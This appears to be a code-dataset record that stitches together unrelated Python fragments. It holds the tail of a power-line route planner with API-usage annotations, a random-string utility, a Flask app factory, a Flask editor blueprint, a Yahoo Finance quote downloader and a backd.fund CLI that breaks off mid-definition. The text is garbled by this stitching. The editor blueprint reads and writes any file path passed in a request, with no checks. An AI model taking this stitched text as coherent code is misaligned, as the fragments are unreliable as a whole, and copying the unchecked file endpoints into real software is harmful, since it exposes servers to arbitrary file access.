factor = 1 - (1 / factor**2)
graph.set_corridor(
corridor,
cfg.start_inds,
cfg.dest_inds,
factor_or_n_edges=factor,
sample_method="simple"
)
# main path computation
path_gt, path_costs_gt, cost_sum_wg = graph.single_sp(
**vars(cfg)
)
edge_numbers.append(graph.n_edges)
if factor == 1 or factor == 0:
actual_pipe.append((1, 0))
break
corridor = get_distance_surface(
graph.hard_constraints.shape,
[path_gt],
mode="dilation",
n_dilate=10 # dist
)
# estimated edges are pixels times neighbors
# divided by resolution squared
estimated_edges_10 = len(np.where(corridor > 0)[0]) * len(
graph.shifts
) / ((PIPE[pipe_step + 1])**2)
now_dist = (mult_factor * graph.n_edges) / estimated_edges_10
# print("reduce corridor:", dist)
corridor = get_distance_surface(
graph.hard_constraints.shape, [path_gt],
mode="dilation",
n_dilate=int(np.ceil(now_dist))
)
# print(
# "estimated with distance ", int(np.ceil(now_dist)),
# len(np.where(corridor > 0)[0]) * len(graph.shifts) /
# ((PIPE[pipe_step + 1])**2)
# )
actual_pipe.append([factor, int(np.ceil(now_dist))])
graph.remove_vertices(corridor)
time_pipeline = time.time() - tic
print("OVERALL TIME:", time_pipeline)
nr_edges = np.max(edge_numbers)
if pipe_kind == 0:
ground_truth_paths[g] = path_gt
path_bl = ground_truth_paths[g]
logging(
ID,
graph,
path_gt,
path_costs_gt,
cfg,
nr_edges,
time_pipeline,
comp_path=path_bl
)
|
[
"numpy.sum",
"argparse.ArgumentParser",
"csv.writer",
"numpy.ceil",
"numpy.asarray",
"power_planner.utils.utils_costs.CostUtils.compute_angle_costs",
"numpy.ones",
"power_planner.utils.utils_ksp.KspUtils.path_distance",
"time.time",
"numpy.max",
"pickle.load",
"numpy.where",
"numpy.dot",
"power_planner.utils.utils.get_distance_surface",
"os.path.join"
] |
[((2127, 2152), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (2150, 2152), False, 'import argparse\n'), ((2479, 2508), 'os.path.join', 'os.path.join', (['""".."""', '"""outputs"""'], {}), "('..', 'outputs')\n", (2491, 2508), False, 'import os\n'), ((1095, 1117), 'numpy.asarray', 'np.asarray', (['path_costs'], {}), '(path_costs)\n', (1105, 1117), True, 'import numpy as np\n'), ((1281, 1310), 'numpy.sum', 'np.sum', (['(belgium_inst_corr > 0)'], {}), '(belgium_inst_corr > 0)\n', (1287, 1310), True, 'import numpy as np\n'), ((3436, 3505), 'os.path.join', 'os.path.join', (['PATH_FILES', 'f"""{INST}_data_{SCENARIO}_{SCALE_PARAM}.dat"""'], {}), "(PATH_FILES, f'{INST}_data_{SCENARIO}_{SCALE_PARAM}.dat')\n", (3448, 3505), False, 'import os\n'), ((1147, 1192), 'numpy.sum', 'np.sum', (['path_costs[:, -n_categories:]'], {'axis': '(0)'}), '(path_costs[:, -n_categories:], axis=0)\n', (1153, 1192), True, 'import numpy as np\n'), ((1222, 1261), 'numpy.dot', 'np.dot', (['summed_costs', 'cfg.class_weights'], {}), '(summed_costs, cfg.class_weights)\n', (1228, 1261), True, 'import numpy as np\n'), ((2005, 2022), 'csv.writer', 'writer', (['write_obj'], {}), '(write_obj)\n', (2011, 2022), False, 'from csv import writer\n'), ((3574, 3593), 'pickle.load', 'pickle.load', (['infile'], {}), '(infile)\n', (3585, 3593), False, 'import pickle\n'), ((995, 1030), 'power_planner.utils.utils_costs.CostUtils.compute_angle_costs', 'CostUtils.compute_angle_costs', (['path'], {}), '(path)\n', (1024, 1030), False, 'from power_planner.utils.utils_costs import CostUtils\n'), ((4396, 4407), 'time.time', 'time.time', ([], {}), '()\n', (4405, 4407), False, 'import time\n'), ((6491, 6511), 'numpy.max', 'np.max', (['edge_numbers'], {}), '(edge_numbers)\n', (6497, 6511), True, 'import numpy as np\n'), ((715, 771), 'power_planner.utils.utils_ksp.KspUtils.path_distance', 'KspUtils.path_distance', (['path', 'comp_path'], {'mode': '"""eucl_max"""'}), "(path, comp_path, mode='eucl_max')\n", (737, 771), False, 'from power_planner.utils.utils_ksp import KspUtils\n'), ((845, 902), 'power_planner.utils.utils_ksp.KspUtils.path_distance', 'KspUtils.path_distance', (['path', 'comp_path'], {'mode': '"""eucl_mean"""'}), "(path, comp_path, mode='eucl_mean')\n", (867, 902), False, 'from power_planner.utils.utils_ksp import KspUtils\n'), ((4338, 4370), 'numpy.ones', 'np.ones', (['belgium_inst_corr.shape'], {}), '(belgium_inst_corr.shape)\n', (4345, 4370), True, 'import numpy as np\n'), ((5203, 5299), 'power_planner.utils.utils.get_distance_surface', 'get_distance_surface', (['graph.hard_constraints.shape', '[path_gt]'], {'mode': '"""dilation"""', 'n_dilate': '(10)'}), "(graph.hard_constraints.shape, [path_gt], mode=\n 'dilation', n_dilate=10)\n", (5223, 5299), False, 'from power_planner.utils.utils import get_distance_surface\n'), ((6399, 6410), 'time.time', 'time.time', ([], {}), '()\n', (6408, 6410), False, 'import time\n'), ((5973, 5990), 'numpy.ceil', 'np.ceil', (['now_dist'], {}), '(now_dist)\n', (5980, 5990), True, 'import numpy as np\n'), ((6301, 6318), 'numpy.ceil', 'np.ceil', (['now_dist'], {}), '(now_dist)\n', (6308, 6318), True, 'import numpy as np\n'), ((5551, 5573), 'numpy.where', 'np.where', (['(corridor > 0)'], {}), '(corridor > 0)\n', (5559, 5573), True, 'import numpy as np\n')]
|
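The corridor-width heuristic in the inner loop is the least obvious step; here it is with hypothetical counts, showing how the dilation radius is chosen from the current edge count and the estimated edges of the next, finer stage:

import numpy as np

corridor_pixels = 50_000    # hypothetical len(np.where(corridor > 0)[0])
n_shifts = 40               # hypothetical len(graph.shifts)
next_factor = 2             # next entry of PIPE
n_edges = 1_200_000         # hypothetical graph.n_edges
mult_factor = 13

estimated_edges = corridor_pixels * n_shifts / next_factor**2   # 500000.0
now_dist = (mult_factor * n_edges) / estimated_edges             # 31.2
print(int(np.ceil(now_dist)))   # 32: dilation radius for get_distance_surface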
# -*- coding: utf-8 -*-
"""
pip_services3_commons.random.RandomString
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
RandomString implementation
:copyright: Conceptual Vision Consulting LLC 2018-2019, see AUTHORS for more details.
:license: MIT, see LICENSE for more details.
"""
from typing import List
import random
from .RandomBoolean import RandomBoolean
from .RandomInteger import RandomInteger
_digits = "01234956789"
_symbols = "_,.:-/.[].{},#-!,$=%.+^.&*-() "
_alpha_lower = "abcdefghijklmnopqrstuvwxyz"
_alpha_upper = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
_alpha = _alpha_upper + _alpha_lower
_chars = _alpha + _digits + _symbols
class RandomString(object):
"""
Random generator for string values.
Example:
.. code-block:: python
        value1 = RandomString.pick_char("ABC")     # Possible result: "C"
        value2 = RandomString.pick(["A","B","C"])  # Possible result: "B"
"""
@staticmethod
def pick(values: List[str]) -> str:
"""
        Picks a random string from an array of strings.
        :param values: strings to pick from
        :return: a randomly picked string.
"""
if values is None or len(values) == 0:
return ''
return random.choice(values)
@staticmethod
def pick_char(values: str) -> str:
"""
Picks a random character from a string.
:param values: a string to pick a char from
:return: a randomly picked char.
"""
if values is None or len(values) == 0:
return ''
index = RandomInteger.next_integer(len(values))
return values[index]
@staticmethod
def distort(value: str) -> str:
"""
Distorts a string by randomly replacing characters in it.
:param value: a string to distort.
        :return: a distorted string.
"""
value = value.lower()
if RandomBoolean.chance(1, 5):
value = value[0:1].upper() + value[1:]
if RandomBoolean.chance(1, 3):
value = value + random.choice(_symbols)
return value
@staticmethod
def next_alpha_char() -> str:
"""
        Generates a random alpha character [A-Za-z].
        :return: a random character.
"""
return random.choice(_alpha)
@staticmethod
def next_string(min_size: int, max_size: int) -> str:
"""
Generates a random string, consisting of upper and lower case letters (of the English alphabet),
digits (0-9), and symbols ("_,.:-/.[].{},#-!,$=%.+^.&*-() ").
:param min_size: (optional) minimum string length.
:param max_size: maximum string length.
:return: a random string.
"""
result = ''
        max_size = max_size if max_size is not None else min_size
length = RandomInteger.next_integer(min_size, max_size)
for i in range(length):
result += random.choice(_chars)
return result
|
[
"random.choice"
] |
[((1250, 1271), 'random.choice', 'random.choice', (['values'], {}), '(values)\n', (1263, 1271), False, 'import random\n'), ((2291, 2312), 'random.choice', 'random.choice', (['_alpha'], {}), '(_alpha)\n', (2304, 2312), False, 'import random\n'), ((2934, 2955), 'random.choice', 'random.choice', (['_chars'], {}), '(_chars)\n', (2947, 2955), False, 'import random\n'), ((2066, 2089), 'random.choice', 'random.choice', (['_symbols'], {}), '(_symbols)\n', (2079, 2089), False, 'import random\n')]
|
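Example calls for the helpers above; the results are random, so the comments show one possible output each:

print(RandomString.pick(["A", "B", "C"]))     # e.g. 'B'
print(RandomString.pick_char("ABC"))          # e.g. 'C'
print(RandomString.next_string(5, 10))        # e.g. 'k$Tq2w8'
print(RandomString.distort("hello world"))    # e.g. 'Hello world$'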
import os
from flask import Flask
from flask_migrate import Migrate
from flask_sqlalchemy import SQLAlchemy
from models.tree import configure as config_db_tree
from models.specie import configure as config_db_specie
from models.group import configure as config_db_group
from models.harvest import configure as config_db_harvest
def create_app():
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///sq.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['JWT_SECRET_KEY'] = os.environ.get('SECRET_KEY')
from routes import bp_trees
app.register_blueprint(bp_trees)
config_db_tree(app)
# config_db_specie(app)
# config_db_group(app)
# config_db_harvest(app)
Migrate(app, app.db)
return app
|
[
"os.environ.get",
"flask.Flask",
"flask_migrate.Migrate",
"models.tree.configure"
] |
[((369, 384), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (374, 384), False, 'from flask import Flask\n'), ((542, 570), 'os.environ.get', 'os.environ.get', (['"""SECRET_KEY"""'], {}), "('SECRET_KEY')\n", (556, 570), False, 'import os\n'), ((651, 670), 'models.tree.configure', 'config_db_tree', (['app'], {}), '(app)\n', (665, 670), True, 'from models.tree import configure as config_db_tree\n'), ((763, 783), 'flask_migrate.Migrate', 'Migrate', (['app', 'app.db'], {}), '(app, app.db)\n', (770, 783), False, 'from flask_migrate import Migrate\n')]
|
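Typical use of the factory above; it needs this project's `routes` and `models` packages on the path and a SECRET_KEY in the environment (e.g. `export SECRET_KEY=dev`):

if __name__ == '__main__':
    app = create_app()
    app.run(debug=True)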
from flask import Blueprint
from flask import render_template, jsonify, request, redirect, url_for
mod = Blueprint('demo1', __name__)
@mod.route('/', methods=["GET", "POST"])
def index():
return redirect(url_for('demo1.editor'))
@mod.route('/editor', methods=["GET", "POST"])
def editor():
return render_template('demo1.html')
@mod.route('/fetch', methods=["GET", "POST"])
def fetch_file():
filepath = request.args.get('path')
if not filepath:
return "No path passed", 403
    try:
        # decode to str: jsonify cannot serialize raw bytes
        with open(filepath, "rb") as f:
            content = f.read().decode("utf-8", errors="replace")
    except OSError:
        return "Error reading file", 403
return jsonify(content=content)
@mod.route('/save', methods=["GET", "POST"])
def save_file():
filepath = request.args.get('path')
content = request.args.get('content')
if not filepath:
return "No path passed", 403
if not content:
return "No content passed", 403
    try:
        # request args arrive as str, so encode before writing in binary mode
        with open(filepath, "wb") as f:
            f.write(content.encode())
        message = "File saved successfully"
    except OSError:
        return "Error writing file", 403
return jsonify(content=message)
|
[
"flask.Blueprint",
"flask.request.args.get",
"flask.jsonify",
"flask.url_for",
"flask.render_template"
] |
[((106, 134), 'flask.Blueprint', 'Blueprint', (['"""demo1"""', '__name__'], {}), "('demo1', __name__)\n", (115, 134), False, 'from flask import Blueprint\n'), ((312, 341), 'flask.render_template', 'render_template', (['"""demo1.html"""'], {}), "('demo1.html')\n", (327, 341), False, 'from flask import render_template, jsonify, request, redirect, url_for\n'), ((423, 447), 'flask.request.args.get', 'request.args.get', (['"""path"""'], {}), "('path')\n", (439, 447), False, 'from flask import render_template, jsonify, request, redirect, url_for\n'), ((626, 650), 'flask.jsonify', 'jsonify', ([], {'content': 'content'}), '(content=content)\n', (633, 650), False, 'from flask import render_template, jsonify, request, redirect, url_for\n'), ((730, 754), 'flask.request.args.get', 'request.args.get', (['"""path"""'], {}), "('path')\n", (746, 754), False, 'from flask import render_template, jsonify, request, redirect, url_for\n'), ((769, 796), 'flask.request.args.get', 'request.args.get', (['"""content"""'], {}), "('content')\n", (785, 796), False, 'from flask import render_template, jsonify, request, redirect, url_for\n'), ((1109, 1133), 'flask.jsonify', 'jsonify', ([], {'content': 'message'}), '(content=message)\n', (1116, 1133), False, 'from flask import render_template, jsonify, request, redirect, url_for\n'), ((213, 236), 'flask.url_for', 'url_for', (['"""demo1.editor"""'], {}), "('demo1.editor')\n", (220, 236), False, 'from flask import render_template, jsonify, request, redirect, url_for\n')]
|
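The blueprint can be exercised without a server via Flask's test client; the scratch file below exists only for the demonstration:

import os
import tempfile
from flask import Flask

app = Flask(__name__)
app.register_blueprint(mod)

fd, path = tempfile.mkstemp()                 # scratch file to fetch
with os.fdopen(fd, 'w') as f:
    f.write('hello')

client = app.test_client()
print(client.get('/fetch', query_string={'path': path}).json)
# {'content': 'hello'}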
#!/usr/bin/env python
import logging
import aiohttp
import asyncio
from tqdm.asyncio import tqdm_asyncio
from tqdm.contrib.logging import logging_redirect_tqdm
import pandas as pd
import numpy as np
import time
import datetime as dt
from typing import Collection, Dict, List, Optional, Tuple, Union
from yahoo_finance import _download_single_ticker_chart_data, download_ticker_sector_industry
logger = logging.getLogger(__name__)
HEADERS = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
}
async def download_tickers_sector_industry(tickers: List[str]) -> pd.DataFrame:
async with aiohttp.ClientSession(headers=HEADERS) as session:
print("\nDownloading stock industry and sector")
with logging_redirect_tqdm():
tickers_info = await tqdm_asyncio.gather(
*[download_ticker_sector_industry(session, ticker) for ticker in tickers]
)
if None in tickers_info:
errored_tickers = [ticker for ticker, ticker_info in zip(tickers, tickers_info) if ticker_info is None]
tickers_info = [ticker_info for ticker_info in tickers_info if ticker_info is not None]
print(f"Out of {len(tickers)} tickers missing info, we could get {len(tickers_info)}")
print(f"Couldn't get info for the following {len(errored_tickers)}: {', '.join(errored_tickers)}")
return pd.DataFrame(tickers_info, columns=["SYMBOL", "SECTOR", "INDUSTRY"])
async def download_tickers_quotes(
tickers: List[str], start_date: int, end_date: int, interval: str
) -> Tuple[pd.DataFrame, Dict]:
"""Download quotes and their currencies for all the specified tickers in the specified time window.
Parameters
----------
tickers : List[str]
The list of tickers to download data for
start_date : int
The start date in POSIX format.
end_date : int
The end date in POSIX format.
interval : str
The interval between each data point (e.g. "1d")
Returns
-------
    Tuple[pd.DataFrame, Dict]
        A tuple containing the quotes DataFrame and a dict of their currencies.
"""
async with aiohttp.ClientSession(headers=HEADERS) as session:
print("\nDownloading stock quotes")
with logging_redirect_tqdm():
tickers_chart_data = await tqdm_asyncio.gather(
*[
_download_single_ticker_chart_data(session, ticker, start_date, end_date, interval)
for ticker in tickers
]
)
if None in tickers_chart_data:
errored_tickers = [ticker for ticker, ticker_info in zip(tickers, tickers_chart_data) if ticker_info is None]
tickers_chart_data = [t for t in tickers_chart_data if t is not None]
print(f"Out of {len(tickers)} tickers, we could get quotes for {len(tickers_chart_data)}")
print(f"Couldn't get quotes for: {', '.join(errored_tickers)}")
quotes = {ticker_dict["ticker"]: ticker_dict["quotes"] for ticker_dict in tickers_chart_data}
currencies = {ticker_dict["ticker"]: ticker_dict["currency"] for ticker_dict in tickers_chart_data}
return pd.concat(quotes, axis="columns", sort=True), currencies
def extract_ticker_list(tickers: Union[Collection[str], str]) -> List[str]:
if isinstance(tickers, (list, set, tuple)):
pass
elif isinstance(tickers, str):
# Replacing commas by spaces helps removing excess spaces between commas if any
tickers = tickers.replace(",", " ").split()
else:
raise ValueError("tickers must be a str consisting of a comma separated list of tickers or a list of tickers")
return list(set([ticker.upper() for ticker in tickers]))
def parse_start_end_date(
start_date: Optional[str] = None, end_date: Optional[str] = None, default_start_days_ago=365
) -> Tuple[int, int]:
end_date = int(time.time()) if end_date is None else int(dt.datetime.strptime(end_date, "%Y-%m-%d").timestamp())
start_date = (
        int((dt.datetime.today() - dt.timedelta(default_start_days_ago)).timestamp())
if start_date is None
else int(dt.datetime.strptime(start_date, "%Y-%m-%d").timestamp())
)
return start_date, end_date
def download_tickers_info(
tickers: list, start_date: Optional[str] = None, end_date: Optional[str] = None, interval: str = "1d"
) -> dict:
"""
Download historical data for tickers in the list.
Parameters
----------
tickers: list
Tickers for which to download historical information.
    start_date: str, optional
        Start downloading data from this date (format "%Y-%m-%d").
    end_date: str, optional
        End downloading data at this date (format "%Y-%m-%d").
interval: str
Frequency between data.
Returns
-------
data: dict
Dictionary including the following keys:
- tickers: list of tickers
- logp: array of log-adjusted closing prices, shape=(num stocks, length period);
- volume: array of volumes, shape=(num stocks, length period);
- sectors: dictionary of stock sector for each ticker;
- industries: dictionary of stock industry for each ticker.
"""
logger.info(f"Downloading data for {len(tickers)} tickers")
tickers = extract_ticker_list(tickers)
stock_info_filename = "stock_info.csv"
try:
stock_info_df = pd.read_csv(stock_info_filename)
logger.info(f"Reading stock info found in file '{stock_info_filename}'")
except FileNotFoundError:
# Creating an empty dataframe
stock_info_columns = ["SYMBOL", "CURRENCY", "SECTOR", "INDUSTRY"]
stock_info_df = pd.DataFrame(columns=stock_info_columns)
# Downloading stock quotes and currencies
start_date, end_date = parse_start_end_date(start_date, end_date)
stocks_quotes_df, currencies = asyncio.run(download_tickers_quotes(tickers, start_date, end_date, interval))
# Remove tickers with excess null values
stocks_quotes_df = stocks_quotes_df.loc[:, (stocks_quotes_df.isnull().mean() < 0.33)]
assert stocks_quotes_df.shape[0] > 0, Exception("No symbol with full information is available.")
# Fill in null values
stocks_quotes_df = stocks_quotes_df.fillna(method="bfill").fillna(method="ffill").drop_duplicates()
final_list_tickers = stocks_quotes_df.columns.get_level_values(0).unique()
failed_to_get_tickers_quotes = [ticker for ticker in tickers if ticker not in final_list_tickers]
if len(failed_to_get_tickers_quotes) > 0:
print(
f"\nRemoving {failed_to_get_tickers_quotes} from list of symbols because we could not collect complete quotes."
)
# Downloading missing stocks info
tickers_already_fetched_info = stock_info_df["SYMBOL"].values
tickers_missing_info = [ticker for ticker in tickers if ticker not in tickers_already_fetched_info]
if len(tickers_missing_info) > 0:
missing_tickers_info_df = asyncio.run(download_tickers_sector_industry(tickers_missing_info))
missing_tickers_info_df["CURRENCY"] = missing_tickers_info_df["SYMBOL"].apply(currencies.get)
stock_info_df = pd.concat([stock_info_df, missing_tickers_info_df])
stock_info_df.to_csv(stock_info_filename, index=False)
# Taking the quote currency as the one that appears the most in the data
default_currency = stock_info_df["CURRENCY"].mode()[0]
# Downloading the exchange rate between the default currency and all the others in the data
currencies = stock_info_df["CURRENCY"].to_list()
exchange_rates = get_exchange_rates(
from_currencies=stock_info_df["CURRENCY"].dropna().to_list(),
to_currency=default_currency,
dates_index=stocks_quotes_df.index,
start_date=start_date,
end_date=end_date,
interval=interval,
)
return dict(
tickers=final_list_tickers,
dates=pd.to_datetime(stocks_quotes_df.index),
price=stocks_quotes_df.xs("Adj Close", level=1, axis="columns").to_numpy().T,
volume=stocks_quotes_df.xs("Volume", level=1, axis="columns").to_numpy().T,
currencies=currencies,
exchange_rates=exchange_rates,
default_currency=default_currency,
sectors={ticker: sector for ticker, sector in zip(stock_info_df["SYMBOL"], stock_info_df["SECTOR"])},
industries={ticker: industry for ticker, industry in zip(stock_info_df["SYMBOL"], stock_info_df["INDUSTRY"])},
)
def get_exchange_rates(
from_currencies: list,
to_currency: str,
dates_index: pd.DatetimeIndex,
start_date: int,
end_date: int,
interval: str = "1d",
) -> dict:
"""
    For each currency other than the default one, it downloads exchange rate
    closing prices to the default currency and returns them keyed by currency.
Parameters
----------
from_currencies: list
A list of currencies to convert.
to_currency: str
Currency to convert to.
    dates_index: pd.DatetimeIndex
        Dates for which exchange rates should be available.
    start_date: int
        Start downloading data from this POSIX timestamp.
    end_date: int
        End downloading data at this POSIX timestamp.
interval: str
Frequency between data.
Returns
-------
xrates: dict
A dictionary with currencies as keys and list of exchange rates at desired dates as values.
"""
from_currencies = [currency for currency in np.unique(from_currencies) if currency != to_currency]
if len(from_currencies) == 0:
return {}
xrates = asyncio.run(async_get_exchange_rates(from_currencies, to_currency, start_date, end_date, interval))
    # reindex is a method; assigning to it (xrates.reindex = ...) silently did nothing
    xrates = xrates.reindex(dates_index)
xrates = xrates.fillna(method="bfill").fillna(method="ffill")
return xrates.to_dict(orient="list")
async def async_get_exchange_rates(
from_currencies: list,
to_currency: str,
start_date: int,
end_date: int,
interval: str,
):
async with aiohttp.ClientSession(headers=HEADERS) as session:
currencies_chart_data = await asyncio.gather(
*[
_download_single_ticker_chart_data(
session, from_currency + to_currency + "=x", start_date, end_date, interval
)
for from_currency in from_currencies
]
)
quotes = [chart_data["quotes"]["Adj Close"] for chart_data in currencies_chart_data]
return pd.concat(quotes, keys=from_currencies, axis="columns", sort=True)
|
[
"pandas.DataFrame",
"datetime.datetime.today",
"pandas.read_csv",
"numpy.unique",
"tqdm.contrib.logging.logging_redirect_tqdm",
"time.time",
"aiohttp.ClientSession",
"datetime.datetime.strptime",
"pandas.to_datetime",
"datetime.timedelta",
"yahoo_finance.download_ticker_sector_industry",
"yahoo_finance._download_single_ticker_chart_data",
"pandas.concat",
"logging.getLogger"
] |
[((404, 431), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (421, 431), False, 'import logging\n'), ((1442, 1510), 'pandas.DataFrame', 'pd.DataFrame', (['tickers_info'], {'columns': "['SYMBOL', 'SECTOR', 'INDUSTRY']"}), "(tickers_info, columns=['SYMBOL', 'SECTOR', 'INDUSTRY'])\n", (1454, 1510), True, 'import pandas as pd\n'), ((10455, 10521), 'pandas.concat', 'pd.concat', (['quotes'], {'keys': 'from_currencies', 'axis': '"""columns"""', 'sort': '(True)'}), "(quotes, keys=from_currencies, axis='columns', sort=True)\n", (10464, 10521), True, 'import pandas as pd\n'), ((686, 724), 'aiohttp.ClientSession', 'aiohttp.ClientSession', ([], {'headers': 'HEADERS'}), '(headers=HEADERS)\n', (707, 724), False, 'import aiohttp\n'), ((2207, 2245), 'aiohttp.ClientSession', 'aiohttp.ClientSession', ([], {'headers': 'HEADERS'}), '(headers=HEADERS)\n', (2228, 2245), False, 'import aiohttp\n'), ((3215, 3259), 'pandas.concat', 'pd.concat', (['quotes'], {'axis': '"""columns"""', 'sort': '(True)'}), "(quotes, axis='columns', sort=True)\n", (3224, 3259), True, 'import pandas as pd\n'), ((5375, 5407), 'pandas.read_csv', 'pd.read_csv', (['stock_info_filename'], {}), '(stock_info_filename)\n', (5386, 5407), True, 'import pandas as pd\n'), ((7146, 7197), 'pandas.concat', 'pd.concat', (['[stock_info_df, missing_tickers_info_df]'], {}), '([stock_info_df, missing_tickers_info_df])\n', (7155, 7197), True, 'import pandas as pd\n'), ((9991, 10029), 'aiohttp.ClientSession', 'aiohttp.ClientSession', ([], {'headers': 'HEADERS'}), '(headers=HEADERS)\n', (10012, 10029), False, 'import aiohttp\n'), ((807, 830), 'tqdm.contrib.logging.logging_redirect_tqdm', 'logging_redirect_tqdm', ([], {}), '()\n', (828, 830), False, 'from tqdm.contrib.logging import logging_redirect_tqdm\n'), ((2315, 2338), 'tqdm.contrib.logging.logging_redirect_tqdm', 'logging_redirect_tqdm', ([], {}), '()\n', (2336, 2338), False, 'from tqdm.contrib.logging import logging_redirect_tqdm\n'), ((3943, 3954), 'time.time', 'time.time', ([], {}), '()\n', (3952, 3954), False, 'import time\n'), ((5655, 5695), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': 'stock_info_columns'}), '(columns=stock_info_columns)\n', (5667, 5695), True, 'import pandas as pd\n'), ((7899, 7937), 'pandas.to_datetime', 'pd.to_datetime', (['stocks_quotes_df.index'], {}), '(stocks_quotes_df.index)\n', (7913, 7937), True, 'import pandas as pd\n'), ((9464, 9490), 'numpy.unique', 'np.unique', (['from_currencies'], {}), '(from_currencies)\n', (9473, 9490), True, 'import numpy as np\n'), ((3985, 4027), 'datetime.datetime.strptime', 'dt.datetime.strptime', (['end_date', '"""%Y-%m-%d"""'], {}), "(end_date, '%Y-%m-%d')\n", (4005, 4027), True, 'import datetime as dt\n'), ((4174, 4218), 'datetime.datetime.strptime', 'dt.datetime.strptime', (['start_date', '"""%Y-%m-%d"""'], {}), "(start_date, '%Y-%m-%d')\n", (4194, 4218), True, 'import datetime as dt\n'), ((4073, 4092), 'datetime.datetime.today', 'dt.datetime.today', ([], {}), '()\n', (4090, 4092), True, 'import datetime as dt\n'), ((4095, 4112), 'datetime.timedelta', 'dt.timedelta', (['(365)'], {}), '(365)\n', (4107, 4112), True, 'import datetime as dt\n'), ((10127, 10242), 'yahoo_finance._download_single_ticker_chart_data', '_download_single_ticker_chart_data', (['session', "(from_currency + to_currency + '=x')", 'start_date', 'end_date', 'interval'], {}), "(session, from_currency + to_currency +\n '=x', start_date, end_date, interval)\n", (10161, 10242), False, 'from yahoo_finance import _download_single_ticker_chart_data, download_ticker_sector_industry\n'), ((904, 952), 'yahoo_finance.download_ticker_sector_industry', 'download_ticker_sector_industry', (['session', 'ticker'], {}), '(session, ticker)\n', (935, 952), False, 'from yahoo_finance import _download_single_ticker_chart_data, download_ticker_sector_industry\n'), ((2439, 2526), 'yahoo_finance._download_single_ticker_chart_data', '_download_single_ticker_chart_data', (['session', 'ticker', 'start_date', 'end_date', 'interval'], {}), '(session, ticker, start_date, end_date,\n interval)\n', (2473, 2526), False, 'from yahoo_finance import _download_single_ticker_chart_data, download_ticker_sector_industry\n')]
|
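A sketch of driving the downloader above; it hits Yahoo Finance, so it needs network access, and the tickers and dates are only examples:

if __name__ == "__main__":
    data = download_tickers_info(
        ["AAPL", "MSFT"], start_date="2021-01-01", end_date="2021-06-30"
    )
    print(data["tickers"])
    print(data["price"].shape)          # (num stocks, length period)
    print(data["default_currency"])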
import argparse
import pickle
from . import executor
from .db import create_indices
from .protocol import Protocol
class ParseKwargs(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
setattr(namespace, self.dest, {})
for value in values:
key, value = value.split("=")
getattr(namespace, self.dest)[key] = value
parser = argparse.ArgumentParser(
prog="backd", description="Command-line interface for backd.fund"
)
def add_protocol_choice(subparser):
subparser.add_argument(
"-p",
"--protocol",
default="compound",
help="protocol to use",
choices=Protocol.registered(),
)
subparsers = parser.add_subparsers(dest="command")
subparsers.add_parser("create-indices")
process_all_events_parser = subparsers.add_parser("process-all-events")
add_protocol_choice(process_all_events_parser)
process_all_events_parser.add_argument(
"--max-block", type=int, help="block up to which the simulation should run"
)
process_all_events_parser.add_argument("--hooks", nargs="+", help="hooks to execute")
process_all_events_parser.add_argument(
"-o", "--output", required=True, help="output pickle file"
)
def add_state_arg(subparser):
subparser.add_argument("-s", "--state", required=True, help="state pickle file")
def add_output_arg(subparser, required=False):
subparser.add_argument("-o", "--output", required=required, help="output file")
plot_parser = subparsers.add_parser("plot")
add_protocol_choice(plot_parser)
plot_subparsers = plot_parser.add_subparsers(dest="subcommand")
plot_supbow_num_time_parser = plot_subparsers.add_parser(
"suppliers-borrowers-over-time",
help="plots suppliers and borrowers over time",
)
add_state_arg(plot_supbow_num_time_parser)
add_output_arg(plot_supbow_num_time_parser)
plot_supbow_num_time_parser.add_argument(
"-i", "--interval", default=100, type=int, help="interval between blocks"
)
plot_supbow_time_parser = plot_subparsers.add_parser(
"supply-borrow-over-time",
help="plots supply and borrows over time",
)
add_state_arg(plot_supbow_time_parser)
add_output_arg(plot_supbow_time_parser)
plot_supbow_time_parser.add_argument(
"--resample", default="1d", help="period to use for resampling"
)
plot_liquidable_over_time_parser = plot_subparsers.add_parser(
"liquidable-over-time", help="plots liquidable positions over time"
)
add_output_arg(plot_liquidable_over_time_parser)
plot_liquidable_over_time_parser.add_argument("files", nargs="+", help="files to plot")
plot_liquidable_over_time_parser.add_argument(
"-s", "--styles", nargs="*", help="plot styles", default=["o", "x", "v", "^"]
)
plot_liquidable_over_time_parser.add_argument(
"-l", "--labels", nargs="*", help="plot labels"
)
plot_liquidable_over_time_parser.add_argument(
"--resample", default="1d", help="period to use for resampling"
)
plot_supbow_ratios_time_parser = plot_subparsers.add_parser(
"supply-borrow-ratios-over-time",
help="plots supply and borrow ratios over time",
)
add_state_arg(plot_supbow_ratios_time_parser)
add_output_arg(plot_supbow_ratios_time_parser)
plot_supbow_ratios_time_parser.add_argument(
"-t",
"--thresholds",
nargs="*",
default=[1.0, 1.05, 1.1, 1.25, 1.5, 2.0],
type=float,
help="thresholds to use for plotting",
)
plot_liquidations_time_parser = plot_subparsers.add_parser(
"liquidations-over-time",
help="plots liquidations over time",
)
add_state_arg(plot_liquidations_time_parser)
add_output_arg(plot_liquidations_time_parser)
plot_supply_borrow_distribution_parser = plot_subparsers.add_parser(
"supply-borrow-distribution",
help="plots supply/borrow distribution",
)
add_state_arg(plot_supply_borrow_distribution_parser)
add_output_arg(plot_supply_borrow_distribution_parser)
plot_supply_borrow_distribution_parser.add_argument(
"-p",
"--property",
default="supply",
help="property to plot",
choices=["supply", "borrow"],
)
plot_supply_borrow_distribution_parser.add_argument(
"-t",
"--threshold",
type=int,
default=100,
help="minimum amount of USD to be considered",
)
plot_supply_borrow_distribution_parser.add_argument(
"-b", "--bucket-size", type=int, default=10, help="number of users per bucket"
)
plot_supply_borrow_distribution_parser.add_argument(
"-i", "--interval", default=50, type=int, help="interval between ticks"
)
plot_time_to_liquidation_parser = plot_subparsers.add_parser(
"time-to-liquidation",
help="plots time to liquidation",
)
add_state_arg(plot_time_to_liquidation_parser)
